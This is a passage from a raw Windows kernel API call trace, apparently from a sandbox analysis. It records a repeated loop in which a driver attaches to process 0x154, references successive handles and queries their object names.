Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014841afc0, HandleInformation=0x0) returned 0x0 [0264.735] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.735] PsReleaseProcessExitSynchronization () returned 0x2 [0264.735] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28060 [0264.735] ObQueryNameString (in: Object=0xffffc0014841afc0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.735] ObfDereferenceObject (Object=0xffffc0014841afc0) returned 0x8000 [0264.735] IoCompleteRequest () returned 0x0 [0264.735] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.735] PsAcquireProcessExitSynchronization () returned 0x0 [0264.735] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.735] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001485214d0, HandleInformation=0x0) returned 0x0 [0264.735] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.735] PsReleaseProcessExitSynchronization () returned 0x2 [0264.735] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2805f [0264.735] ObQueryNameString (in: Object=0xffffc001485214d0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.735] ObfDereferenceObject (Object=0xffffc001485214d0) returned 0x8000 [0264.735] IoCompleteRequest () returned 0x0 [0264.735] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.735] PsAcquireProcessExitSynchronization () returned 0x0 [0264.735] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.735] ObReferenceObjectByHandle (in: Handle=0x224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001486d1b30, HandleInformation=0x0) returned 0x0 [0264.735] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.735] PsReleaseProcessExitSynchronization () returned 0x2 [0264.735] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2805e [0264.735] ObQueryNameString (in: Object=0xffffc001486d1b30, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.735] ObfDereferenceObject (Object=0xffffc001486d1b30) returned 0x8000 [0264.735] IoCompleteRequest () returned 0x0 [0264.735] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.735] PsAcquireProcessExitSynchronization () returned 0x0 [0264.735] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.735] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148719cf0, HandleInformation=0x0) returned 0x0 [0264.735] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.735] PsReleaseProcessExitSynchronization () returned 0x2 [0264.736] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2805d [0264.736] ObQueryNameString (in: Object=0xffffc00148719cf0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.736] ObfDereferenceObject (Object=0xffffc00148719cf0) returned 0x8000 [0264.736] IoCompleteRequest () returned 0x0 [0264.736] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.736] PsAcquireProcessExitSynchronization () returned 0x0 [0264.736] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.736] ObReferenceObjectByHandle (in: Handle=0x250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001487f27e0, HandleInformation=0x0) returned 0x0 [0264.736] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.736] PsReleaseProcessExitSynchronization () returned 0x2 [0264.736] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2805c [0264.736] ObQueryNameString (in: Object=0xffffc001487f27e0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.736] ObfDereferenceObject (Object=0xffffc001487f27e0) returned 0x8000 [0264.736] IoCompleteRequest () returned 0x0 [0264.736] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.736] PsAcquireProcessExitSynchronization () returned 0x0 [0264.736] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.736] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148906190, HandleInformation=0x0) returned 0x0 [0264.736] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.736] PsReleaseProcessExitSynchronization () returned 0x2 [0264.736] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2805b [0264.736] ObQueryNameString (in: Object=0xffffc00148906190, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.736] ObfDereferenceObject (Object=0xffffc00148906190) returned 0x8000 [0264.736] IoCompleteRequest () returned 0x0 [0264.736] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.736] PsAcquireProcessExitSynchronization () returned 0x0 [0264.736] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.736] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148a5c190, HandleInformation=0x0) returned 0x0 [0264.736] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.736] PsReleaseProcessExitSynchronization () returned 0x2 [0264.736] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2805a [0264.736] ObQueryNameString (in: Object=0xffffc00148a5c190, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.736] ObfDereferenceObject (Object=0xffffc00148a5c190) returned 0x8000 [0264.736] IoCompleteRequest () returned 0x0 [0264.736] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.736] PsAcquireProcessExitSynchronization () returned 0x0 [0264.736] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.736] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148a59d20, HandleInformation=0x0) returned 0x0 [0264.736] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.736] PsReleaseProcessExitSynchronization () returned 0x2 [0264.736] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28059 [0264.736] ObQueryNameString (in: Object=0xffffc00148a59d20, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.736] ObfDereferenceObject (Object=0xffffc00148a59d20) returned 0x8000 [0264.737] IoCompleteRequest () returned 0x0 [0264.737] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.737] PsAcquireProcessExitSynchronization () returned 0x0 [0264.737] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.737] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148a6ed30, HandleInformation=0x0) returned 0x0 [0264.737] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.737] PsReleaseProcessExitSynchronization () returned 0x2 [0264.737] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28058 [0264.737] ObQueryNameString (in: Object=0xffffc00148a6ed30, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.737] ObfDereferenceObject (Object=0xffffc00148a6ed30) returned 0x8000 [0264.737] IoCompleteRequest () returned 0x0 [0264.737] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.737] PsAcquireProcessExitSynchronization () returned 0x0 [0264.737] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.737] ObReferenceObjectByHandle (in: Handle=0x2b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148ae4ee0, HandleInformation=0x0) returned 0x0 [0264.737] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.737] PsReleaseProcessExitSynchronization () returned 0x2 [0264.737] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28057 [0264.737] ObQueryNameString (in: Object=0xffffc00148ae4ee0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.737] ObfDereferenceObject (Object=0xffffc00148ae4ee0) returned 0x8000 [0264.737] IoCompleteRequest () returned 0x0 [0264.737] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.737] PsAcquireProcessExitSynchronization () returned 0x0 [0264.737] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.737] ObReferenceObjectByHandle (in: Handle=0x2bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148aeade0, HandleInformation=0x0) returned 0x0 [0264.737] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.737] PsReleaseProcessExitSynchronization () returned 0x2 [0264.737] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28056 [0264.737] ObQueryNameString (in: Object=0xffffc00148aeade0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.737] ObfDereferenceObject (Object=0xffffc00148aeade0) returned 0x8000 [0264.737] IoCompleteRequest () returned 0x0 [0264.737] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.737] PsAcquireProcessExitSynchronization () returned 0x0 [0264.737] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.737] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001496bc7e0, HandleInformation=0x0) returned 0x0 [0264.737] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.737] PsReleaseProcessExitSynchronization () returned 0x2 [0264.737] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28055 [0264.737] ObQueryNameString (in: Object=0xffffc001496bc7e0, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.737] ObfDereferenceObject (Object=0xffffc001496bc7e0) returned 0x8000 [0264.737] IoCompleteRequest () returned 0x0 [0264.737] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.737] PsAcquireProcessExitSynchronization () returned 0x0 [0264.738] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.738] ObReferenceObjectByHandle (in: Handle=0x2c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148c141b0, HandleInformation=0x0) returned 0x0 [0264.738] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.738] PsReleaseProcessExitSynchronization () returned 0x2 [0264.738] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28054 [0264.738] ObQueryNameString (in: Object=0xffffc00148c141b0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.738] ObfDereferenceObject (Object=0xffffc00148c141b0) returned 0x8000 [0264.738] IoCompleteRequest () returned 0x0 [0264.738] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.738] PsAcquireProcessExitSynchronization () returned 0x0 [0264.738] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.738] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014a23c060, HandleInformation=0x0) returned 0x0 [0264.738] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.738] PsReleaseProcessExitSynchronization () returned 0x2 [0264.738] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28053 [0264.738] ObQueryNameString (in: Object=0xffffc0014a23c060, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.738] ObfDereferenceObject (Object=0xffffc0014a23c060) returned 0x8000 [0264.738] IoCompleteRequest () returned 0x0 [0264.738] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.738] PsAcquireProcessExitSynchronization () returned 0x0 [0264.738] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.738] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148ca4d40, HandleInformation=0x0) returned 0x0 [0264.738] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.738] PsReleaseProcessExitSynchronization () returned 0x2 [0264.738] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28052 [0264.738] ObQueryNameString (in: Object=0xffffc00148ca4d40, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.738] ObfDereferenceObject (Object=0xffffc00148ca4d40) returned 0x8000 [0264.738] IoCompleteRequest () returned 0x0 [0264.738] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.738] PsAcquireProcessExitSynchronization () returned 0x0 [0264.738] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.738] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cab4a0, HandleInformation=0x0) returned 0x0 [0264.738] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.738] PsReleaseProcessExitSynchronization () returned 0x2 [0264.738] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28051 [0264.738] ObQueryNameString (in: Object=0xffffc00148cab4a0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.738] ObfDereferenceObject (Object=0xffffc00148cab4a0) returned 0x8000 [0264.738] IoCompleteRequest () returned 0x0 [0264.738] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.738] PsAcquireProcessExitSynchronization () returned 0x0 [0264.738] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.738] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148b9ddd0, HandleInformation=0x0) returned 0x0 [0264.738] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.739] PsReleaseProcessExitSynchronization () returned 0x2 [0264.739] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x28050 [0264.739] ObQueryNameString (in: Object=0xffffc00148b9ddd0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.739] ObfDereferenceObject (Object=0xffffc00148b9ddd0) returned 0x8000 [0264.739] IoCompleteRequest () returned 0x0 [0264.739] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.739] PsAcquireProcessExitSynchronization () returned 0x0 [0264.739] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.739] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148ccbe50, HandleInformation=0x0) returned 0x0 [0264.739] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.739] PsReleaseProcessExitSynchronization () returned 0x2 [0264.739] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2804f [0264.739] ObQueryNameString (in: Object=0xffffc00148ccbe50, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.739] ObfDereferenceObject (Object=0xffffc00148ccbe50) returned 0x8000 [0264.739] IoCompleteRequest () returned 0x0 [0264.739] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.739] PsAcquireProcessExitSynchronization () returned 0x0 [0264.739] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.739] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cd0da0, HandleInformation=0x0) returned 0x0 [0264.739] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.739] PsReleaseProcessExitSynchronization () returned 0x2 [0264.739] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2804e [0264.739] ObQueryNameString (in: Object=0xffffc00148cd0da0, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.739] ObfDereferenceObject (Object=0xffffc00148cd0da0) returned 0x8000 [0264.739] IoCompleteRequest () returned 0x0 [0264.739] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.739] PsAcquireProcessExitSynchronization () returned 0x0 [0264.739] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.739] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cd98b0, HandleInformation=0x0) returned 0x0 [0264.739] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.739] PsReleaseProcessExitSynchronization () returned 0x2 [0264.739] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2804d [0264.739] ObQueryNameString (in: Object=0xffffc00148cd98b0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.739] ObfDereferenceObject (Object=0xffffc00148cd98b0) returned 0x8000 [0264.739] IoCompleteRequest () returned 0x0 [0264.739] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.739] PsAcquireProcessExitSynchronization () returned 0x0 [0264.739] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.739] ObReferenceObjectByHandle (in: Handle=0x2f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cf6480, HandleInformation=0x0) returned 0x0 [0264.739] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.739] PsReleaseProcessExitSynchronization () returned 0x2 [0264.739] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2804c [0264.739] ObQueryNameString (in: Object=0xffffc00148cf6480, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.739] ObfDereferenceObject (Object=0xffffc00148cf6480) returned 0x8000 [0264.739] IoCompleteRequest () returned 0x0 [0264.740] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.740] PsAcquireProcessExitSynchronization () returned 0x0 [0264.740] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.740] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cda860, HandleInformation=0x0) returned 0x0 [0264.740] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.740] PsReleaseProcessExitSynchronization () returned 0x2 [0264.740] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2804b [0264.740] ObQueryNameString (in: Object=0xffffc00148cda860, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.740] ObfDereferenceObject (Object=0xffffc00148cda860) returned 0x8000 [0264.740] IoCompleteRequest () returned 0x0 [0264.740] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.740] PsAcquireProcessExitSynchronization () returned 0x0 [0264.740] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.740] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148073820, HandleInformation=0x0) returned 0x0 [0264.740] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.740] PsReleaseProcessExitSynchronization () returned 0x2 [0264.740] ObfDereferenceObject (Object=0xffffe0007fdfa840) returned 0x2804a [0264.740] ObQueryNameString (in: Object=0xffffc00148073820, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.740] ObfDereferenceObject (Object=0xffffc00148073820) returned 0x8000 [0264.740] IoCompleteRequest () returned 0x0 [0264.740] PsLookupProcessByProcessId (in: ProcessId=0x154, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.740] PsAcquireProcessExitSynchronization () returned 0x0 [0264.740] KeStackAttachProcess (in: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0007fdfa840, ApcState=0xffffd000b1b8e400) [0264.740] ObReferenceObjectByHandle (in: Handle=0x2fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cea4e0, HandleInformation=0x0) returned 0x0 [0264.740] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.740] PsReleaseProcessExitSynchronization () returned 0x2 [0264.740] 